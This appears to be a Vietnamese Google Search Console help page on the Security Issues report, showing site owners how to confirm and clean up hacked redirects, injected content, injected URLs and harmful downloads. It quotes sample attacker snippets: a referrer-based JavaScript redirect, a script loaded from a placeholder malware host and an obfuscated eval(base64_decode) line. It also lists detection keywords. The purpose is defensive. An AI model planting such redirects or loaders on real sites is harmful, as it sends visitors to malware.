  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Tin tặc có thể đã chèn mã có hại trực tiếp vào các tệp HTML trên trang web của bạn (ví dụ: thêm lệnh chuyển hướng JavaScript) hoặc vào các tệp tạo nội dung trang web (ví dụ: tệp PHP).

Hãy tìm nạp một trang bị xâm nhập có trong báo cáo và kiểm tra phản hồi. Tin tặc có thể sử dụng một số mánh khóe khác nhau để chuyển hướng khách truy cập từ trang web của bạn đến trang của họ. Sau đây là một số ví dụ:

  • Chuyển hướng:​
    • Chuyển hướng tiêu đề:  Tin tặc có thể chuyển hướng khách truy cập bằng cách sửa đổi (các) tệp cấu hình trên máy chủ của bạn. Tệp cấu hình máy chủ thường cho phép quản trị viên trang web xác định hành vi chuyển hướng URL cho các trang hoặc thư mục cụ thể trên một trang web. Ví dụ: trên máy chủ Apache, đây là tệp .htaccess và httpd.conf.
      ...
      < HTTP/1.1 301 Moved Permanently
      < Date: Sun, 24 Feb 2013 21:06:45 GMT
      < Server: Apache
      < Location: http://<malware-site>/index.html
      < Content-Length: 253
    • Chuyển hướng JavaScript:
      <script>
        if (document.referrer.match(/google\.com/)) {
          window.location("http://<malware-site>/");}
      <script>
  • JavaScript có hại được tải từ một trang web khác:
    <script type='text/javascript' src='http://<malware-site>/js/x55.js'></script>
  • Mã có hại bị xáo trộn để tránh phát hiện:
    eval(base64_decode("d2luZG93LmxvY2F0aW9uPScvL2dvb2dsZS5jb20nOw=="));

Tìm kiếm mã đáng ngờ trong phản hồi của bạn và trên trang web của bạn. Các cụm từ tìm kiếm hữu ích bao gồm "search", "eval", "base64_decode" và "unescape".

3. Dọn dẹp trang web của bạn

Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc tự xóa nội dung vi phạm.

Ngoài ra:

4. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Kiểu tấn công: Chèn nội dung

Một tin tặc đã thêm các đường liên kết hoặc văn bản không liên quan vào các trang trên trang web của bạn. Nội dung được chèn có thể chứa các cụm từ chỉ dược phẩm hoặc nội dung spam khác không liên quan đến nội dung của trang web.

Thông thường, tin tặc chỉnh sửa trang web của bạn theo một trong các cách sau:

  • Bằng cách giành quyền truy cập vào một thư mục không an toàn trên máy chủ của bạn. Ví dụ: bạn có thể đã vô tình để một thư mục có quyền mở.
  • Bằng cách khai thác một lỗ hổng trong phần mềm chạy trên trang web của bạn, chẳng hạn như một hệ thống quản lý nội dung. Ví dụ: bạn có thể đang chạy một phiên bản cũ hơn và kém an toàn của Drupal, Joomla! hoặc WordPress.
  • Bằng cách tấn công các plugin bên chứ ba mà bạn sử dụng trên trang web của mình, chẳng hạn như bộ đếm khách truy cập.

1. Xác định xem bạn có thể tự mình khắc phục vấn đề không

Xem phần Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách tìm kiếm sự trợ giúp nếu bạn nghĩ rằng điều này nằm ngoài khả năng của bạn.

2. Xác nhận vấn đề

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Tìm nạp một số trang trên trang web của bạn và tìm trong phản hồi để xác định nội dung hay đường liên kết đáng ngờ mà không phải do bạn thêm vào. Ví dụ: tìm kiếm các cụm từ chỉ dược phẩm hoặc nội dung spam như "viagra" hoặc "earn money".

3. Dọn dẹp trang web của bạn

Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc xóa nội dung và đường liên kết không liên quan khỏi mỗi trang. Bạn nên khắc phục tất cả các ví dụ về trang bị tấn công hiển thị trong bảng báo cáo về các vấn đề bảo mật. Ngoài ra, hãy tìm kiếm các trang khác trên trang web của bạn mà có thể đã bị tấn công bằng cách sử dụng lệnh tìm kiếm "site:" trên Google và tìm các tệp nguồn trên trang web của bạn.

Ngoài ra:

4. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Kiểu tấn công: Chèn URL

Một tin tặc đã tạo các trang mới trên trang web của bạn, thường chứa các từ hoặc đường liên kết không liên quan. Đôi khi các trang mới này chứa mã mà sẽ thực hiện những điều bạn không có ý định làm, chẳng hạn như chuyển hướng người dùng của bạn đến các trang web khác hoặc làm cho máy chủ web của bạn tham gia hình thức tấn công từ chối dịch vụ vào các trang web khác.

1. Xác định xem bạn có thể tự mình khắc phục vấn đề không

Xem phần Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách tìm kiếm sự trợ giúp nếu bạn nghĩ rằng điều này nằm ngoài khả năng của bạn.

2. Xác nhận vấn đề

Tránh sử dụng trình duyệt để xem các trang bị nhiễm phần mềm độc hại trên trang web của bạn.

Bởi vì phần mềm độc hại thường lây lan bằng cách khai thác lỗ hổng trình duyệt, việc mở một trang bị nhiễm phần mềm độc hại trong một trình duyệt có thể làm hỏng máy tính của bạn. Ngoài ra, tin tặc có thể ẩn nội dung spam bằng kỹ thuật che giấu để tránh bị chủ sở hữu trang web phát hiện.

Dưới đây là hai phương pháp thay thế để xem nội dung theo cách an toàn hơn trên máy tính của bạn:

  • Sử dụng công cụ Kiểm tra URL để xem trang của bạn trong giao diện hiển thị với Google. Điều này rất hữu ích vì nhiều tin tặc thực hiện các sự thay đổi chỉ hiển thị với máy của Google. Ví dụ: họ có thể thêm liên kết từ trang web của bạn vào trang web của họ mà các liên kết này chỉ hiển thị khi liên kết giới thiệu là Google.
  • Sử dụng cURL hoặc Wget để thực hiện các yêu cầu HTTP (chẳng hạn như tìm nạp một trang) từ dòng lệnh. Các công cụ miễn phí này rất hữu ích trong việc chẩn đoán chuyển hướng và có thể xác định liên kết giới thiệu hoặc thông tin tác nhân người dùng. Tin tặc thường chỉ tấn công các tác nhân người dùng hoặc liên kết giới thiệu cụ thể để tránh bị phát hiện và chọn các mục tiêu tốt hơn. Việc sử dụng các công cụ này cho phép bạn bắt chước một mục tiêu. Hãy thử sử dụng các địa chỉ liên kết giới thiệu khác nhau (chẳng hạn như liên kết từ các trang web lớn hoặc các công cụ tìm kiếm khác nhau) nếu yêu cầu của bạn không dẫn đến hành vi gửi nội dung spam. Ví dụ: để bắt chước một người dùng truy cập liên kết từ kết quả Google Tìm kiếm đến www.example.com/page.html trên máy Windows, bạn sẽ sử dụng cURL như sau:

    $curl -v --referer "https://www.google.com" --user-agent "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; FSL 7.0.7.01001)" http://www.example.com/page.html

Truy vấn các URL mẫu được liệt kê trong báo cáo để xem chúng có hoạt động không. Có thể các trang này không phải do bạn tạo, vì vậy bạn sẽ cần xóa các trang trên trang web của mình hoặc loại bỏ mã dùng để tự động tạo các trang đó. Đọc cách tìm và dọn dẹp các trang này khỏi trang web của bạn.

Bạn cũng có thể thực hiện phép tìm kiếm "site":" để tìm các trang mà bạn không tạo.

  • Trên một trang web nhỏ, bạn có thể tìm kiếm [site: example.com] trên Google Tìm kiếm để xem danh sách các trang mà chúng tôi đã lập chỉ mục, để xem có trang nào mà bạn không tạo hay không.
  • Đối với các trang web lớn hơn, bạn có thể sử dụng một truy vấn cụ thể hơn, ví dụ:
    • [site:example.com pharmacy] – Liệt kê tất cả các trang có chứa từ "pharmacy" trên example.com. Thay thế các từ không liên quan thường gặp khác.
    • [site: example.com/wp-admin/] – Liệt kê tất cả các trang trong phần dành cho quản trị viên trên trang WordPress của bạn.

3. Dọn dẹp trang web của bạn

Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế các thư mục bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc xóa các trang không mong muốn và bất kỳ tệp hoặc chức năng nào mà tin tặc sử dụng để tạo các trang đó.

Ngoài ra:

4. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Tệp tải xuống có hại

Trang web của bạn đang cung cấp tệp tải xuống mà Duyệt web An toàn của Google nghĩ là phần mềm độc hại hoặc phần mềm không mong muốn. Trình duyệt Chrome có thể hiển thị cảnh báo khi người dùng truy cập trang web của bạn. Bạn phải xóa các tệp tải xuống này khỏi trang web của bạn để xóa cảnh báo.

1. Đánh giá vấn đề

Nếu các tệp tải xuống này là có chủ đích, hãy xóa chúng khỏi trang web của bạn và chuyển đến bước Yêu cầu xem xét lại.

Nếu không biết bất kỳ tệp tải xuống nào trên trang web của mình, thì bạn có thể đã bị tấn công. Bạn nên khắc phục trang web bị tấn công, rồi tìm và xóa tệp tải xuống.

2. Xác định xem bạn có thể tự mình khắc phục vấn đề không

Xem phần Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách tìm kiếm sự trợ giúp nếu bạn nghĩ rằng điều này nằm ngoài khả năng của bạn.

3. Xác nhận vấn đề

Xem một số trang ví dụ trên trang web của bạn để xem các tệp tải xuống này có tồn tại hay không.

4. Dọn dẹp trang web của bạn

Đọc hướng dẫn về Trường hợp bị tấn công để biết quy trình khắc phục hoàn chỉnh cho trang web của bạn, bao gồm các bước dọn dẹp và mẹo để ngăn trang web của bạn không bị tấn công lần nữa. Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc tự xóa nội dung không liên quan. Hãy sử dụng phần mềm diệt virus để quét các tệp nhị phân và nội dung khác được lưu trữ trên trang web của bạn. Phần mềm diệt virus có thể tìm thấy nhiều loại phần mềm có hại và phần mềm không mong muốn, nhưng rất tiếc là không phải tất cả. Việc gửi phần mềm của bạn cho một chương trình diệt virus (hoặc dịch vụ diệt virus tổng hợp, chẳng hạn như VirusTotal) sẽ cung cấp cho bạn chỉ báo về các vấn đề tiềm ẩn với phần mềm của bạn. Duyệt web An toàn của Google áp dụng tiêu chí riêng của mình để xác định xem một chương trình hay tệp nhị phân có phải là phần mềm không mong muốn hoặc phần mềm độc hại hay không.

5. Xác nhận kết quả khắc phục

Đảm bảo rằng trang web của bạn tuân thủ Chính sách về phần mềm không mong muốn.

6. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Đường liên kết đến các tệp tải xuống có hại

Trang web của bạn đang liên kết đến các trang web cung cấp các tệp tải xuống là phần mềm độc hại hoặc phần mềm không mong muốn, theo công cụ Duyệt web An toàn của Google. Trình duyệt Chrome có thể hiển thị cảnh báo khi người dùng truy cập trang web của bạn. Bạn phải xóa liên kết đến các trang web có hại để xóa cảnh báo này.

1. Đánh giá vấn đề

Nếu các liên kết này là có chủ đích, hãy xóa chúng khỏi trang web của bạn và chuyển đến bước Yêu cầu xem xét lại.

Nếu không biết về các liên kết này thì bạn có thể đã bị tấn công.

2. Xác định xem bạn có thể tự mình khắc phục vấn đề không

Nếu bạn bị tấn công, hãy xem phần Xây dựng nhóm hỗ trợ để biết bạn cần những gì để tự khắc phục vấn đề này, hoặc cách tìm kiếm sự trợ giúp nếu bạn nghĩ rằng điều này nằm ngoài khả năng của bạn.

3. Xác nhận vấn đề

 

Xem một số trang ví dụ trên trang web của bạn để xem các tệp tải xuống này có tồn tại hay không. Trong một số trường hợp, tin tặc có thể ẩn các liên kết này nếu cho rằng bạn là chủ sở hữu trang web, vì vậy hãy thử truy cập URL mẫu bằng công cụ Kiểm tra URL hoặc đăng nhập bằng tài khoản khác hoặc trên một máy tính khác.

4. Dọn dẹp trang web của bạn

Đọc hướng dẫn về Trường hợp bị tấn công để biết quy trình khắc phục hoàn chỉnh cho trang web của bạn, bao gồm các bước dọn dẹp và mẹo để ngăn trang web của bạn không bị tấn công lần nữa. Khi đã sẵn sàng dọn dẹp trang web của bạn, bạn có thể thay thế các tệp bị ảnh hưởng bằng bản sao lưu hợp lệ gần nhất hoặc tự xóa nội dung spam.

5. Xác nhận kết quả khắc phục

Đảm bảo rằng trang web của bạn tuân thủ Chính sách về phần mềm không mong muốn.

6. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Quy trình thanh toán qua dịch vụ di động không rõ ràng

Nếu Google phát hiện thấy trang web của bạn không thông báo đầy đủ cho người dùng về các khoản phí di động bổ sung, thì Chrome có thể hiển thị cảnh báo trước khi người dùng tải một trang làm phát sinh phí.

1. Xác nhận vấn đề

Truy cập các URL ví dụ được liệt kê trong báo cáo để xem trang nào có quy trình thanh toán qua dịch vụ di động không rõ ràng. Xem lại hướng dẫn về hình thức thanh toán qua dịch vụ di động tại đây.

2. Khắc phục vấn đề

Khắc phục các trang của bạn để chúng tuân thủ các phương pháp hay nhất về thanh toán qua dịch vụ di động.

3. Yêu cầu xem xét lại

Khi bạn xác nhận rằng vấn đề đã được khắc phục trên trang web của mình, hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần.

Tệp tải xuống không phổ biến

Trang web của bạn đang cung cấp tệp tải xuống mà công cụ Duyệt web An toàn của Google chưa từng thấy trước đây. Trình duyệt Chrome có thể cảnh báo rằng đây là tệp tải xuống bất thường và có thể nguy hiểm. Cảnh báo sẽ được tự động gỡ bỏ nếu Duyệt web An toàn của Google xác minh rằng tệp an toàn. Xin lưu ý rằng báo cáo không phải lúc nào cũng cung cấp URL ví dụ cho vấn đề này.

Vấn đề này sẽ không ngăn trang hoặc trang web của bạn xuất hiện trong kết quả của Google Tìm kiếm, nhưng trình duyệt Chrome sẽ hiển thị cảnh báo khi người dùng yêu cầu tải xuống các tệp không xác định.

1. Khắc phục vấn đề

Tìm và xác nhận xem các tệp tải xuống của bạn có tuân thủ nguyên tắc về tệp tải xuống không.

  • Nếu bất kỳ tệp tải xuống nào trên trang web của bạn vi phạm các nguyên tắc này, hãy xóa chúng.
  • Nếu tệp tải xuống không vi phạm các nguyên tắc này, bạn không cần phải xóa.

2. Yêu cầu xem xét lại

Khi bạn đã xóa tệp (hoặc xác minh rằng các tệp tải xuống của bạn tuân thủ nguyên tắc tải xuống), hãy yêu cầu xem xét lại tính bảo mật trong bảng báo cáo về các vấn đề bảo mật. Quá trình xem xét lại có thể mất từ vài ngày đến vài tuần. Ngay cả khi bạn không gửi yêu cầu xem xét lại, dần dẫn Google vẫn sẽ đánh giá hầu hết các tệp tải xuống và phân loại chúng là hợp lệ hay có hại. Tuy nhiên, việc gửi yêu cầu xem xét lại có thể giúp đẩy nhanh quá trình đánh giá.

 

Báo cáo Thao tác thủ công có gì khác với báo cáo Vấn đề bảo mật?

Báo cáo Thao tác thủ công liệt kê các vấn đề trên một trang hay trang web mà chủ yếu cố gắng can thiệp vào chỉ mục tìm kiếm của chúng tôi, nhưng không hẳn nguy hiểm với người dùng. Hầu hết các vấn đề được báo cáo ở đây sẽ dẫn đến việc trang hoặc trang web bị giảm hạng hoặc xóa khỏi kết quả tìm kiếm mà không có bất kỳ dấu hiệu trực quan nào cho người dùng.

Báo cáo về các vấn đề bảo mật liệt kê các dấu hiệu cho thấy trang web của bạn đã bị tấn công hoặc hành vi trên trang web của bạn có thể gây hại cho khách truy cập hoặc máy tính của họ: ví dụ: tấn công lừa đảo hoặc cài đặt phần mềm có hại hoặc phần mềm không mong muốn vào máy tính của người dùng. Những trang này có thể xuất hiện kèm theo nhãn cảnh báo trong kết quả tìm kiếm hoặc trình duyệt có thể hiển thị trang cảnh báo trung gian khi người dùng cố gắng truy cập chúng.

Thông tin này có hữu ích không?
Chúng tôi có thể cải thiện trang này bằng cách nào?